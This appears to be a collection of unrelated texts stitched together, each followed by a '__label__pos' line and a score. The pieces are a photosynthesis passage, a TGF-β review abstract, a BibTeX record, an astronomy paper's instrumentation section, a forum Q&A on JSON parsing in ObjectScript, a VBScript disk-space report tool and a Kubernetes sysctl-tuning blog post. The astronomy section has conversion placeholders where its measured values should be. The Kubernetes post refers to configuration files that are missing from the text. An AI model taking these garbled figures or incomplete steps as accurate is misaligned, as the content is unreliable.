In other words, through photosynthesis light energy is captured and then converted into chemical energy, which organisms need in order to survive. Plants are autotrophs: they get energy from sunlight and assemble organic molecules from inorganic resources, which is why the process is called photosynthesis. The word comes from the Greek, in which PHOTO means light and SYNTHESIS means to put together. Ecological considerations in photosynthesis: ecological considerations concern the effects of light, CO2, water, etc. Chlorophyll is not the only pigment found in chloroplasts. There is also a family of orange and yellow pigments called carotenoids. Carotenoids include the carotenes, which are orange, and the xanthophylls, which are yellow. The principal carotene in chloroplasts is beta-carotene, which is located in the chloroplasts along with chlorophyll. At one time, the carotenoids were considered accessory pigments; it was believed that light energy absorbed by carotenoids was transferred to the chlorophylls for use in photosynthesis. It now appears that carotenoids have little direct role in photosynthesis, but function largely to screen the chlorophylls from damage by excess light (see Chapter 6). Carotenoid pigments are not limited to leaves, but are widespread in plant tissues. The color of carrot roots, for example, is due to high concentrations of beta-carotene in the root cells, and lycopene, the red-orange pigment of tomatoes, is also a member of the carotenoid family. Lycopene and beta-carotene are important because of their purported health benefits. Beta-carotene from plants is also the principal source of vitamin A, which plays an important role in human vision. Lycopene is an antioxidant that may help protect against a variety of cancers. Carotenes and xanthophylls are also responsible for the orange and yellow colors in autumn leaves. In response to shortening day length and cooler temperatures, the chloroplast pigments begin to break down. Chlorophyll, which normally masks the carotenoids, breaks down more rapidly than the carotenoids, and the carotenoids are revealed in all their autumn splendor. The red color that appears in some leaves at this time of the year is due to water-soluble anthocyanins, whose synthesis is promoted by the same conditions that promote the breakdown of chlorophyll. Enriching greenhouse air with extra carbon dioxide to boost photosynthesis is known as CO2 fertilization. In practice, the CO2 content may be increased by 150-200 ppm to a total of perhaps 1.5 times atmospheric levels, although some foliage plant growers may supplement with CO2 up to a total of 700-1,000 ppm.
Transforming Growth Factor-β and Endoglin Signaling Orchestrate Wound Healing Front Physiol. 2011 Nov 29;2:89. doi: 10.3389/fphys.2011.00089. eCollection 2011. Abstract Physiological wound healing is a complex process requiring the temporal and spatial co-ordination of various signaling networks, biomechanical forces, and biochemical signaling pathways in both hypoxic and non-hypoxic conditions. Although a plethora of factors are required for successful physiological tissue repair, transforming growth factor beta (TGF-β) expression has been demonstrated throughout wound healing and shown to regulate many processes involved in tissue repair, including production of extracellular matrix (ECM), proteases, and protease inhibitors, as well as the migration, chemotaxis, and proliferation of macrophages, fibroblasts of the granulation tissue, epithelial cells, and capillary endothelial cells. TGF-β mediates these effects by stimulating signaling pathways through a receptor complex which contains Endoglin. Endoglin is expressed in a broad spectrum of proliferating and stem cells, with elevated expression during hypoxia, and regulates important cellular functions such as proliferation and adhesion via Smad signaling. This review focuses on how the TGF-β family and Endoglin regulate stem cell availability and modulate cellular behavior within the wound microenvironment, summarizes current knowledge of the signaling pathways involved, and explores how this information may be applicable to inflammatory and/or angiogenic diseases such as fibrosis, rheumatoid arthritis, and metastatic cancer. Keywords: TGFβ; angiogenesis; endoglin; progenitor cells; stem cells; wound healing.
@misc{Przesławski_Tomasz_Magnetic_2005, author={Przesławski, Tomasz and Wolkenberg, Andrzej and Kaniewski, Janusz and Regiński, Kazimierz and Jasik, Agata}, address={Wrocław}, access={Dla wszystkich w zakresie dozwolonego użytku}, year={2005}, description={Optica Applicata, Vol. 35, 2005, nr 3, s. 627-634}, language={eng}, abstract={In this paper, we describe the design and fabrication process of Hall and magnetoresistor cross-shaped sensors using In0.53Ga0.47As/InP layer structures as active media. The influence of the geometric correction factor GH on the sensitivity parameters of these devices has been investigated. The results have been used to optimize the structure design and behavior at temperatures ranging from 3 to 300 K. The large changes of the galvanomagnetic parameters vs. magnetic field and temperature allow these devices to be used as signal and measurement magnetic field sensors.}, title={Magnetic field sensors based on undoped In0.53Ga0.47As/InP heterostructures fabricated by molecular beam epitaxy and metalorganic chemical vapor deposition}, type={artykuł}, contributor={Gaj, Miron. Redakcja}, contributor={Wilk, Ireneusz. Redakcja}, rights={Wszystkie prawa zastrzeżone (Copyright)}, publisher={Oficyna Wydawnicza Politechniki Wrocławskiej}, keywords={optyka, Hall sensors, magnetoresistors, InGaAs/InP heterostructures, electronic transport, geometric correction factor, molecular beam epitaxy (MBE), metalorganic chemical vapor deposition (MOCVD)}, }
__label__pos
0.867616
2. Instrumentation and data quality

2.1. Filter systems

Our new observations were obtained with three different automatic photoelectric telescopes (APT) in the years 1991-96: the 0.75-m Fairborn APT on Mt. Hopkins in Arizona, U.S.A. equipped with V, R, and I filters matching the Johnson-Cousins system, the 0.25-m Phoenix APT also on Mt. Hopkins but equipped with Johnson UBV, and the 0.8-m Catania APT on Mt. Etna in Sicily, Italy with UBV filters for the Johnson system. All measurements were made differentially with respect to a nearby comparison star. Table 2 identifies the comparison stars and the check stars and also gives the total number of obtained mean differential V magnitudes per star and per telescope (listed separately for the Fairborn APT, the Phoenix-10, and the Catania APT). Both APTs on Mt. Hopkins observed each program star differentially with respect to a comparison star and a check star in a fixed sequence of N, CK, C, S, and V integrations, where N is a bright navigation star, CK is the check star, C the comparison star, S the sky background usually between the comparison and the variable star, and V the variable itself. One entry for n in Table 2 thus comprises at least three individual variable-minus-comparison readings. In order to eliminate the datapoints grossly in error we applied a statistical procedure that eliminated all data with an internal standard deviation greater than 0.02 mag as well as data that deviated from the rest by at least 3σ (see, e.g., Hall et al. 1986). While the 0.02-mag filtering could exclude an appreciable part of the data for a particular star, the number of mean magnitudes excluded by the 3σ procedure was usually just a few datapoints. We note that, before eliminating the bad points, the whole data set was phased with the most likely photometric period and then examined for possible eclipses and flares. The relative telescope zeropoints in the V bandpass have been determined from the seasonal averages of the check-minus-comp magnitudes of several groups that were on all three APTs simultaneously and agree within their formal uncertainties of around 0.01 mag.

2.2. The T7 APT on Mt. Hopkins

The 0.75-m T7 APT was put into routine operation on JD 2 449 022 in 1993. During the first year of operation it had alignment problems with the optics that led to a reduced data precision. Altogether four problems (A-D) occurred; their duration and influence on the data are identified in Table 3. Three of the four problems were caused by a filter-wheel malfunction that produced VVV photometry instead of the full V, R, I sequence.

Table 3: Problems encountered with the T7 APT

  Problem   Time (JD 2449000+)   Influence on data       Cause
  A         144-164              No R and I data         Filter wheel stuck at V
  B         235-246              No R and I data         Filter wheel stuck at V
  C         312-322              No R and I data         Filter wheel stuck at V
  D         600-850              σ_ext increased         Telescope out of focus

After the obviously deviant R and I data had been eliminated we computed external uncertainties σ_ext for all check-minus-comparison magnitudes. Such uncertainties allow a quick look at the data quality expected for the variable-minus-comparison data from the T7 APT.
In 1993, its mean external standard deviation of a "nightly mean" from a yearly mean was tex2html_wrap_inline4203, tex2html_wrap_inline4203, and tex2html_wrap_inline4207 mag in V, R, and I, respectively. In the second year the telescope was continuously out of focus and the annual mean external standard deviation was still tex2html_wrap_inline4215, tex2html_wrap_inline4217, and tex2html_wrap_inline4219 mag for the three bandpasses. This was fixed in early 1995 and the nightly mean external standard deviations then decreased to tex2html_wrap_inline4221, tex2html_wrap_inline4217, and tex2html_wrap_inline4217 mag in V, R, and I, respectively. By early 1996 the telescope was being continuously monitored and the external uncertainties dropped to 0.006 in V and below 0.010 in R and I. Integration time was usually set to 10 s except for V410 Tau where 20 s were used.

2.3. The Phoenix APT on Mt. Hopkins

The Phoenix-10 APT has been in routine operation since 1983 and is managed by Mike Seeds as a multi-user telescope (see Phoenix-10 Newsletter and Seeds 1995). Strassmeier & Hall (1988a) examined the data quality of the Phoenix-10 APT from its first four years of operation and found external uncertainties of tex2html_wrap_inline4239, tex2html_wrap_inline4241, and tex2html_wrap_inline4243 mag in V, B, and U, respectively. Integration time was set to 10 s for all targets. Recently, Henry (1995) compared the long-term external precision of the Phoenix-10 APT with APTs of larger aperture (the Vanderbilt/Tennessee State 0.4 m and the Tennessee State 0.8 m) and verified the telescope's long-term stability.

2.4. The Catania APT on Mt. Etna

First Catania-APT data came from the fourth quarter of 1992. Its standard group observing sequence followed a similar pattern, with the same meaning for the symbols as above. The sky background is measured at a fixed position near each star. Each magnitude on the variable star consists of six readings, compared to four with the other APTs. Integration time in U, B, and V was set to 15, 10, and 10 s, respectively. The typical standard deviations of the averaged variable-minus-comparison and check-minus-comparison magnitudes for stars brighter than tex2html_wrap_inline4263 mag are of the order of 0.015, 0.010, and 0.007 mag for U, B, and V, respectively. The accuracy of the standard V magnitude is 0.01 mag, for U-B about 0.02 mag, and for B-V about 0.01 mag. Copyright by the European Southern Observatory (ESO)
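The two-stage rejection described in Sect. 2.1 (drop points whose internal standard deviation exceeds 0.02 mag, then reject points deviating from the rest by at least 3σ) is easy to prototype. The following is only an illustrative NumPy sketch, not code from the paper; it assumes the nightly means and their internal standard deviations are available as equal-length arrays:

import numpy as np

def filter_nightly_means(mags, internal_sigma, max_internal_sigma=0.02, clip=3.0):
    # Stage 1: the "0.02-mag filtering" on the internal scatter of each nightly mean
    mags = np.asarray(mags, dtype=float)
    internal_sigma = np.asarray(internal_sigma, dtype=float)
    good = mags[internal_sigma <= max_internal_sigma]
    # Stage 2: reject points that deviate from the remaining data by at least clip * sigma
    deviation = np.abs(good - good.mean())
    return good[deviation < clip * good.std(ddof=1)]

# hypothetical usage with made-up differential magnitudes
v_minus_c = [1.012, 1.015, 1.013, 1.250, 1.014]
sigma_int = [0.005, 0.004, 0.006, 0.030, 0.005]
print(filter_nightly_means(v_minus_c, sigma_int))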
__label__pos
0.551805
Question Craig Regester · Aug 30, 2017 Retrieving values from JSON %Library.DynamicObject (2017.1) Good afternoon -  I'm in the process of learning to make COS calls to REST-based web services and while I am having success, I'm struggling on how to parse out the results (I admit I'm very green at this): Here's the code retrieving the JSON response: w !,"Get the JSON" Set Result = {}.%FromJSON(Request.HttpResponse.Data) This has Result as a Library.DynamicObject. I can then write out the response using: w !,Result.%ToJSON() This works, I can see the response is valid and what I want. Here is the JSON returned (de-identified):   { "RecordIDs": [ { "ID": "1234", "Type": "INTERNAL" }, { "ID": "1234", "Type": "EXTERNAL" } ], "ContactIDs": null, "Items": [ { "ItemNumber": "320", "Value": null, "Lines": [ { "LineNumber": 0, "Value": "1", "Sublines": null }, { "LineNumber": 1, "Value": "100063287", "Sublines": null } ] } ] } What is the easiest method to get the LineNumber Values out? I could potentially have several so I'm trying to get an output kind of like Value1~Value2~Value3 so I can piece them out later. Appreciate any advice - I'll keep pluggin away on it.  0 0 1,214 Discussion (4)1 Log in or sign up to continue set obj = {"RecordIDs":[{"ID":"1234","Type":"INTERNAL"},{"ID":"1234","Type":"EXTERNAL"}],"ContactIDs":null,"Items":[{"ItemNumber":"320","Value":null,"Lines":[{"LineNumber":0,"Value":"1","Sublines":null},{"LineNumber":1,"Value":"100063287","Sublines":null}]}]} w obj.Items.%Get(0).Lines.%Get(0).LineNumber >0 w obj.Items.%Get(0).Lines.%Get(1).LineNumber >1 To iterate over arbitrary number of array elements use iterator: set iterator = obj.Items.%Get(0).Lines.%GetIterator() while iterator.%GetNext(.key,.line) { w line.LineNumber,! } >0 >1 Awesome, this is exactly what I was looking for! Thank you. I was getting close with %Get and the iterator but wasn't quite making the connection with the whole line.LineNumber part.   Thanks!!! Thanks for your answer as well! This is actually what we were already doing with 2015.1 when handling JSON. So moving into 2017.1, I was hoping to make more use of the built-in JSON handlers because the JSON response I posted was a rather simple one - some of our more complex responses has our string manipulations getting quite long-in-the-tooth.  I'd suggest in this case to take the original JSON String from Request.HttpResponse.Data and split it by "LineNumber": eg: set sep="""LineNumber"":" for line =2:1:$l(json,sep) set line(line)=+$p(json,sep,line) and you get  line=3 line(2)=0 line(3)=1 I admit it's not very object-ish but efficient
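Building on the accepted answer's iterator, one way to get the tilde-separated output the question asks for is sketched below. This is untested ObjectScript written only as an illustration; it assumes obj already holds the parsed response and that it is the Value of each line that should be collected:

set out=""
set iterator = obj.Items.%Get(0).Lines.%GetIterator()
while iterator.%GetNext(.key,.line) {
    // append a "~" separator before every element except the first
    set out = out_$select(out="":"",1:"~")_line.Value
}
write out
// prints 1~100063287 for the sample JSON above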
__label__pos
0.615672
By David Wiseman (Administrator)Created 03 Aug 2008, Modified 08 Nov 2009 My Rating: Vote Rating: (1 votes) Views:8202 Downloads:1078 Drive Space Report Language:  HTA Compatibility Windows XP Yes Windows 2003 Yes Windows 2000 Unknown Windows NT Unknown Vista Yes Windows 2008 Unknown Description Display a drive space report for multiple computers. This HTA can check the drives of multiple computers and produce a HTML report that will highlight any drives that are low on free space. The HTA also generates a CSV version of the report. Notes The Drive Space Report is a GUI script that allows you to view the disk drives and free space on several computers.  Just enter the computer name or IP Address, one per line and click the "Generate Report" button to display the report.  Click the "Download Report (CSV)" button to save the report in CSV (comma separated) format. drive space report   Code Line Numbers: On  Off      Plain Text <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <head> <title>WiseSoft Drive Space Report</title> <hta:application applicationname="WiseSoft Drive Space Report" scroll="yes" singleinstance="yes" windowstate="normal"> <style type="text/css"> body { background-color: #F2F2F2; font: bold 10pt arial,sans-serif; color:#787878; margin:0px; } table { width: 400; border: 2px solid; border-collapse: collapse; border-color: #696969; } th { border: 1px dotted #111111; border-color: #787878; color: #FFFFFF; font: bold 12pt arial,sans-serif; background-color: #787878; text-align: left; } td { border: 1px dotted #111111; border-color: #787878; font: bold 10pt arial,sans-serif; color: #787878; } .neutral { background-color: #FFFFE0; color: #787878; } .good { background-color: green; color: white; } .warning { background-color: yellow; color: black; } .critical { background-color: red; color: black; } .tableHead td { padding: 5px; font: bold 14pt arial,sans-serif; background-color: #787878; text-align: center; color: white; } h1 { background-color: #787878; color: white; font: bold 20pt arial,sans-serif; text-align: center; } </style> </head> <script language="VBScript"> Option Explicit ' ********** Constants ********** const bytesToMB = 1048576 const bytesToGB = 1073741824 const bytesToTB = 1099511627776 const warningLevel = 20 ' < 20% = warning (yellow) const criticalLevel = 10 ' < 10% = critical (red) const goodLevel = 50 ' > 50% = good (green) ' ********************************** sub GetDriveReportsHTML dim html, strComputer,strComputers strComputers = txtComputers.value for each strComputer in SPLIT(strComputers,chr(13)) strComputer = TRIM(REPLACE(strComputer,chr(10),"")) if strComputer <> "" then html = html & GetDriveReportHTML(strComputer) end if next report.InnerHTML = html end sub function ConvertToDiskUnit(byval value) IF (value/bytesToTb) > 1 THEN ConvertToDiskUnit = round(value / bytesToTB,1) & " TB" ELSEIF (value/bytesToGb) > 1 THEN ConvertToDiskUnit = round(value / bytesToGB,1) & " GB" ELSE ConvertToDiskUnit = round(value / bytesToMB,1) & " MB" END IF end function function GetDriveReportHTML(byval strComputer) Dim objWMIService, objItem, colItems Dim strDriveType, strDiskSize, htmlDriveReport ON ERROR RESUME NEXT Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") IF Err.Number <> 0 THEN GetDriveReportHTML = "<span class=""critical"">Error connecting to '" & strComputer & "'</span><br/><br/>" Err.Clear ON ERROR GOTO 0 EXIT FUNCTION END IF ON ERROR GOTO 0 Set colItems = objWMIService.ExecQuery("Select * from Win32_LogicalDisk WHERE 
DriveType=3") htmlDriveReport = "<table><tr class=""tableHead""><td colspan=""5"">" & strComputer & _ "</td></tr><tr><th>Drive</th><th>Size</th><th>Used</th><th>Free</th><th>Free(%)</th></tr>" For Each objItem in colItems DIM pctFreeSpace,strFreeSpace,strusedSpace, cssClass pctFreeSpace = round(((objItem.FreeSpace / objItem.Size) * 100),1) strDiskSize = ConvertToDiskUnit(objItem.Size) strFreeSpace = ConvertToDiskUnit(objItem.FreeSpace) strUsedSpace = ConvertToDiskUnit(objItem.Size-objItem.FreeSpace) IF pctFreeSpace < criticalLevel THEN cssClass = "critical" ELSEIF pctFreeSpace < warningLevel THEN cssClass = "warning" ELSEIF pctFreeSpace > goodLevel THEN cssClass = "good" ELSE cssClass = "neutral" END IF dim strChart strChart = "<div style=""width=100%;""><span style=""width=" & 100-pctFreeSpace & _ "%;background-color:blue;""></span><span style=""width=" & pctFreeSpace & _ "%;background-color:#FF00FF;""></span></div>" htmlDriveReport = htmlDriveReport & "<tr><td>" & objItem.Name & strChart & "</td><td>" & _ strDiskSize & "</td><td>" & strUsedSpace & "</td><td>" & _ strFreeSpace & "</td><td class=""" & cssClass & """>" & pctFreeSpace & "%</td></tr>" Next htmlDriveReport = htmlDriveReport + "</table></br>" GetDriveReportHTML = htmlDriveReport end function sub GetDriveReportsCSV dim csv, strComputer,strComputers, path strComputers = txtComputers.value csv = "Computer,Drive,Size,Used,Free,Free(%)" for each strComputer in SPLIT(strComputers,chr(13)) strComputer = TRIM(REPLACE(strComputer,chr(10),"")) if strComputer <> "" then if csv <> "" then csv = csv & VbCrLf end if csv = csv & GetDriveReportCSV(strComputer) end if next path = INPUTBOX("Enter FileName:","Enter FileName","MyDriveReport.csv") if path = "" then exit sub end if WriteTextFile csv, path end sub function GetDriveReportCSV(byval strComputer) Dim objWMIService, objItem, colItems Dim strDriveType, strDiskSize, csvDriveReport ON ERROR RESUME NEXT Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") IF Err.Number <> 0 THEN GetDriveReportCSV = strComputer & ",Error,Error,Error,Error,Error" Err.Clear ON ERROR GOTO 0 EXIT FUNCTION END IF ON ERROR GOTO 0 Set colItems = objWMIService.ExecQuery("Select * from Win32_LogicalDisk WHERE DriveType=3") For Each objItem in colItems DIM pctFreeSpace,strFreeSpace,strusedSpace, cssClass pctFreeSpace = round(((objItem.FreeSpace / objItem.Size) * 100),1) strDiskSize = ConvertToDiskUnit(objItem.Size) strFreeSpace = ConvertToDiskUnit(objItem.FreeSpace) strUsedSpace = ConvertToDiskUnit(objItem.Size-objItem.FreeSpace) IF pctFreeSpace < criticalLevel THEN cssClass = "critical" ELSEIF pctFreeSpace < warningLevel THEN cssClass = "warning" ELSEIF pctFreeSpace > goodLevel THEN cssClass = "good" ELSE cssClass = "neutral" END IF if csvDriveReport <> "" then csvDriveReport = csvDriveReport & VbCrLf end if csvDriveReport = csvDriveReport & strComputer & "," & objItem.Name & "," & _ strDiskSize & "," & strUsedSpace & "," & _ strFreeSpace & "," & pctFreeSpace & "%" Next GetDriveReportCSV = csvDriveReport end function sub WriteTextFile(byval txt,byval path) DIM objFSO, objTextFile set objFSO = createobject("Scripting.FileSystemObject") IF objFSO.FileExists(path) THEN IF msgbox("Warning: file already exists! 
Overwrite file?",vbYesNo+vbQuestion,"Overwrite File?") = vbNo THEN exit sub END IF END IF set objTextFile = objFSO.CreateTextFile(path) objTextFile.Write(txt) objTextFile.Close msgbox "Created '" & path & "' Report",vbOKOnly+vbInformation end sub </script> <body> <h1 style="margin-bottom: 0px;"> Drive Space Report</h1> <div style="text-align: right; font: bold 8pt arial,sans-serif; color: #787878;"> By David Wiseman, <a target="_blank" href="http://www.wisesoft.co.uk">www.wisesoft.co.uk</a> </div><br /> <div style="text-align: center;"> Enter names of computers (one line per computer):<br /> <textarea name="txtComputers" rows="4" cols="50"> localhost . 127.0.0.1 </textarea><br /> <input style="font-weight:bold;" onclick="GetDriveReportsHTML" type="submit" value="Generate Report"></input> <input onclick="GetDriveReportsCSV" type="submit" value="Download Report (CSV)"></input> <br /> <br /> </div> <div style="text-align: center;" id="report"> </div> </body> </html>   Got a useful script? Click here to upload!     Post Comment Order By:   User Comments        David Wiseman (Administrator) United Kingdom Posted On: 8/7/2008 3:15:02 PM Just added a chart (progress bar) to show the used disk space.
__label__pos
0.663169
I am trying to prove the correctness of the following algorithm, which checks whether there exists a path from u to v in a graph G = (V,E). I know that to finish up the proof, I need to prove termination, the invariants, and correctness, but I have no idea how. I think I need to use induction on the while loop but I am not exactly sure how. How do I prove those three characteristics about an algorithm? Comment: what "following algorithm"? –  phil_20686 May 12 '14 at 12:54 2 Answers Answer 1 (accepted): Disclaimer: I don't know how formal you want your proof to be and I'm not familiar with formal proofs. 1. Induction on the while loop: Is it true at the beginning? Does it remain true after a step (quite simple path property)? 2. Same idea, induction on k (why k+1???): Is it true at the beginning? Does it remain true after a step (quite simple path property)? 3. Think of Reach as a strictly increasing set. Termination: maybe you can use a quite simple property linked to the diameter of the graph? (This question could probably be better answered elsewhere, on http://cstheory.stackexchange.com/ maybe?) Answer 2: There are a lot of possibilities. For example, for a Breadth First Search, we note that: (1) The algorithm never visits the same node twice (as any path back must be >= the length of the path that put it in the discovered pile already). (2) At every step, it adds exactly one node. Thus, it clearly must terminate on any finite graph, as the set of nodes which are discoverable cannot be larger than the set of nodes which are in the graph. Finally, since, given a start node, it will only terminate when it has reached every node which is connected by any path to the start node, it will always find a path between the start and target if it exists. You can rewrite these logical steps in deeper rigour if you like, for example, by showing that the list of visited nodes is strictly increasing and non-convergent (i.e. adding one to something repeatedly tends to infinity), that the termination condition must be met at some finite value, and that a non-convergent increasing function always intersects a given bound exactly once. BFS is an easy example because it has such simple logic, but proving these things for a given algorithm may be extremely tricky.
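Since the question never shows its algorithm, the sketch below is a generic breadth-first search reachability check (not the asker's code), with comments tying the second answer's observations to concrete invariants:

from collections import deque

def path_exists(adj, u, v):
    # adj maps each node to an iterable of its neighbours.
    # Invariant 1: a node enters `discovered` at most once, so it is never visited twice.
    # Invariant 2: each loop iteration removes exactly one queued node, and only
    #   finitely many nodes can ever be queued, so the loop terminates on a finite graph.
    # Correctness: when the queue empties, every node reachable from u has been
    #   discovered, so v is reachable from u iff it was found along the way.
    discovered = {u}
    queue = deque([u])
    while queue:
        node = queue.popleft()
        if node == v:
            return True
        for neighbour in adj.get(node, ()):
            if neighbour not in discovered:
                discovered.add(neighbour)
                queue.append(neighbour)
    return False

g = {1: [2, 3], 2: [4], 3: [], 4: []}
print(path_exists(g, 1, 4))   # True
print(path_exists(g, 4, 1))   # False with this directed adjacency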
__label__pos
0.99253
Material Design for Angular vs. Foundation vs. Flat UI Get help choosing one of these Get news updates about these tools Favorites 66 Favorites 86 Favorites 32 Hacker News, Reddit, Stack Overflow Stats • - • 21 • 0 • - • 1.19K • 702 • 3 • 6 • 13 GitHub Stats Description What is Material Design for Angular? Material Design is a specification for a unified system of visual, motion, and interaction design that adapts across different devices. Our goal is to deliver a lean, lightweight set of AngularJS-native UI elements that implement the material design system for use in Angular SPAs. What is Foundation? Foundation is the most advanced responsive front-end framework in the world. You can quickly prototype and build sites or apps that work on any kind of device with Foundation, which includes layout constructs (like a fully responsive grid), elements and best practices. What is Flat UI? Flat UI is a beautiful theme for Bootstrap. We have redesigned many of its components to look flat in every pixel. Pros Why do developers choose Material Design for Angular? • Why do you like Material Design for Angular? Why do developers choose Foundation? • Why do you like Foundation? Why do developers choose Flat UI? Why do you like Flat UI? Cons What are the cons of using Material Design for Angular? No Cons submitted yet for Material Design for Angular Downsides of Material Design for Angular? What are the cons of using Foundation? No Cons submitted yet for Foundation Downsides of Foundation? What are the cons of using Flat UI? No Cons submitted yet for Flat UI Downsides of Flat UI? Companies What companies use Material Design for Angular? 212 companies on StackShare use Material Design for Angular What companies use Foundation? 658 companies on StackShare use Foundation What companies use Flat UI? 4 companies on StackShare use Flat UI Integrations What tools integrate with Material Design for Angular? 1 tools on StackShare integrate with Material Design for Angular What tools integrate with Foundation? 4 tools on StackShare integrate with Foundation What tools integrate with Flat UI? 1 tools on StackShare integrate with Flat UI What are some alternatives to Material Design for Angular, Foundation, and Flat UI? • Bootstrap - Simple and flexible HTML, CSS, and JS for popular UI components and interactions • Semantic UI - A UI Component library implemented using a set of specifications designed around natural language • Materialize - A modern responsive front-end framework based on Material Design • Material UI - A CSS Framework and a Set of React Components that Implement Google's Material Design See all alternatives to Material Design for Angular Latest News How Design Insights Transformed Foundation Building ... Foundation Building Blocks: Over 100 Components to J... Foundation & CSS Grid: Think Beyond the Page Interest Over Time Get help choosing one of these
__label__pos
0.972278
Fibromyalgia May Increase the Risk of Premature Death • Health • August 15, 2023 In recent years, the impact of fibromyalgia on overall health has gained significant attention. Fibromyalgia, a chronic pain disorder characterized by widespread musculoskeletal pain, fatigue, and sleep disturbances, has long been associated with reduced quality of life. However, emerging research suggests a more alarming concern: the potential link between fibromyalgia and an increased risk of premature death. Understanding Fibromyalgia What is Fibromyalgia? Fibromyalgia is a complex and debilitating condition that affects millions of people worldwide. It is characterized by widespread pain, tenderness, and heightened sensitivity to touch. While its exact cause remains elusive, factors such as genetics, infections, and physical or emotional trauma are believed to contribute to its development. Impact on Daily Life Individuals with fibromyalgia often face a range of symptoms beyond pain. Fatigue, sleep disturbances, cognitive difficulties (often referred to as “fibro fog”), and mood disorders can significantly impact their daily lives, making even simple tasks challenging. The Startling Connection: Fibromyalgia and Premature Death Research Findings Recent studies have raised concerns about the potential link between fibromyalgia and premature death. While research is ongoing, some studies suggest that individuals with fibromyalgia might face a higher mortality rate compared to the general population. These findings have ignited discussions among healthcare professionals and researchers alike. Possible Explanations The reasons behind the potential link are multifaceted. Chronic inflammation, a common feature of fibromyalgia, has been associated with various health complications, including cardiovascular diseases and neurodegenerative disorders. Moreover, the impact of fibromyalgia on mental health can lead to depression and anxiety, further contributing to health challenges. Navigating the Challenges Holistic Approach to Management Managing fibromyalgia goes beyond addressing physical pain. A holistic approach that combines medical treatments, lifestyle modifications, and mental health support is crucial. Physical therapy, low-impact exercises, and stress-reduction techniques can help alleviate symptoms and improve overall well-being. Importance of Early Diagnosis Early diagnosis plays a pivotal role in managing fibromyalgia effectively. Recognizing the symptoms and seeking medical attention promptly can lead to early interventions that may prevent the progression of the condition and its potential complications. Conclusion In conclusion, the relationship between fibromyalgia and the risk of premature death is a complex and evolving area of study. While research indicates a possible connection, more investigations are needed to establish a definitive link. Individuals living with fibromyalgia should focus on comprehensive management strategies, including medical care, lifestyle adjustments, and mental health support, to enhance their quality of life and potentially mitigate associated risks.
__label__pos
0.841453
Thursday, 21 September 2017

Kernel tuning in Kubernetes

Kubernetes is a great piece of technology, it trivialises things that 5 years ago required solid ops knowledge and makes DevOps attainable for the masses. More and more people start jumping on the Kubernetes bandwagon nowadays, however sooner or later people realise that a pod is not exactly a small VM magically managed by Kubernetes.

Kernel tuning

So you've deployed your app in Kubernetes, everything works great, you just need to scale now. What do you do to scale? The naive answer is: add more pods. Sure, you can do that, but pods will quickly hit kernel limits. One particular kernel parameter I have in mind is net.core.somaxconn. This parameter represents the maximum number of connections that can be queued for acceptance. The default value on Linux is 128, which is rather low:

root@x:/# sysctl -a | grep "net.core.somaxconn"
net.core.somaxconn = 128

You might get away with not increasing it, but I believe it's wasteful to create new pods unless there is a cpu or memory need. In order to update a sysctl parameter, in a normal Linux VM, the following command will just work:

root@x:/# sysctl -w net.core.somaxconn=10000

However, try it in a pod and you get this:

root@x:/# sysctl -w net.core.somaxconn=10000
sysctl: setting key "net.core.somaxconn": Read-only file system

Now you start realising that this is not your standard Linux VM where you can do whatever you want, this is Kubernetes' turf and you have to play by its rules.

Docker image baking

At this point you're probably wondering why am I not just baking the sysctl parameters into the docker image. The docker image could be as simple as this:

FROM alpine
#Increase the number of connections
RUN echo "net.core.somaxconn=10000" >> /etc/sysctl.conf

Well, the bad news is that it doesn't work. As soon as you deploy the app and connect to the pod, the kernel parameter is still 128. Variations on the docker image baking theme can be attempted, however I could not successfully do it and I have a strong feeling that it's not doable this way.

Kubernetes sysctl

There is documentation around sysctl in Kubernetes here. So Kubernetes acknowledges the fact that kernel tuning is required sometimes and provides explicit support for that. Then it should be as easy as following the documentation, right? Not quite, the documentation is a bit vague and it didn't quite work for me. I'm not creating pods directly as described in the documentation, I am using deployments. After a bit of research, I did find a way to do it, via init containers. Init containers are specialised Containers that run before app Containers and can contain utilities or setup scripts not present in an app image. Let's see an example (sketched below). In order for this to work you will need to create a custom ubuntu image that never terminates. It's a bit of a hack, I know, but the point is to keep the pod running so that we can connect and inspect that the sysctl changes were successfully applied. This is the Dockerfile (also sketched below). In order to test this we have to build the image first:

docker build -t ubuntu-test-image .

I am using minikube locally, for testing, so I'm creating the deployment like this:

kubectl apply -f ubuntu-deployment.yml

In a Kubernetes cluster, the config has to be provided with the command. Once the deployment was created let's log into the pod and inspect the changes.
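The ubuntu Dockerfile and ubuntu-deployment.yml referenced above were embedded snippets that did not survive in this text. What follows is only a minimal sketch of what they might have looked like: the names ubuntu-test-image and ubuntu-test are taken from the commands in the post, while the base image tag and the apiVersion are assumptions (a 2017-era cluster may need extensions/v1beta1 for Deployments).

Dockerfile (sketch): an image that never terminates, so the pod stays up for inspection

FROM ubuntu:16.04
CMD ["sleep", "infinity"]

ubuntu-deployment.yml (sketch): a privileged init container applies the sysctls before the app container starts

apiVersion: apps/v1                  # assumption; older clusters used extensions/v1beta1
kind: Deployment
metadata:
  name: ubuntu-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: ubuntu-test
  template:
    metadata:
      labels:
        app: ubuntu-test
    spec:
      initContainers:
      - name: sysctl-tune
        image: busybox
        securityContext:
          privileged: true           # needed so sysctl -w is allowed
        command:
        - sh
        - -c
        - sysctl -w net.core.somaxconn=10000 && sysctl -w net.ipv4.ip_local_port_range="1024 65535"
      containers:
      - name: ubuntu-test
        image: ubuntu-test-image
        imagePullPolicy: IfNotPresent

Because the init container shares the pod's network namespace, the namespaced sysctls it sets (such as net.core.somaxconn) remain in effect for the app container, which is what the checks below confirm.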
First we need to find the pod id: bogdan@x:/$ kubectl get pods | grep ubuntu-test ubuntu-test-1420464772-v0vr1     1/1       Running            0          11m Once we have the pod id, we can log into the pod like this:  kubectl exec -it ubuntu-test-1420464772-v0vr1   -- /bin/bash Then check the sysctl parameters: :/#  sysctl -a | grep "net.core.somaxconn"  net.core.somaxconn = 10000  :/# sysctl -a | grep "net.ipv4.ip_local_port_range"  net.ipv4.ip_local_port_range = 1024     65535  As you can see the changes were applied.  4 comments: 1. Awesome post. thanks for sharing ReplyDelete 2. Being new to the blogging world I feel like there is still so much to learn. Your tips helped to clarify a few things for me. Thanks for this great share. Kubernetes Architecture ReplyDelete 3. great ! thank you helping me. ReplyDelete
__label__pos
0.575812
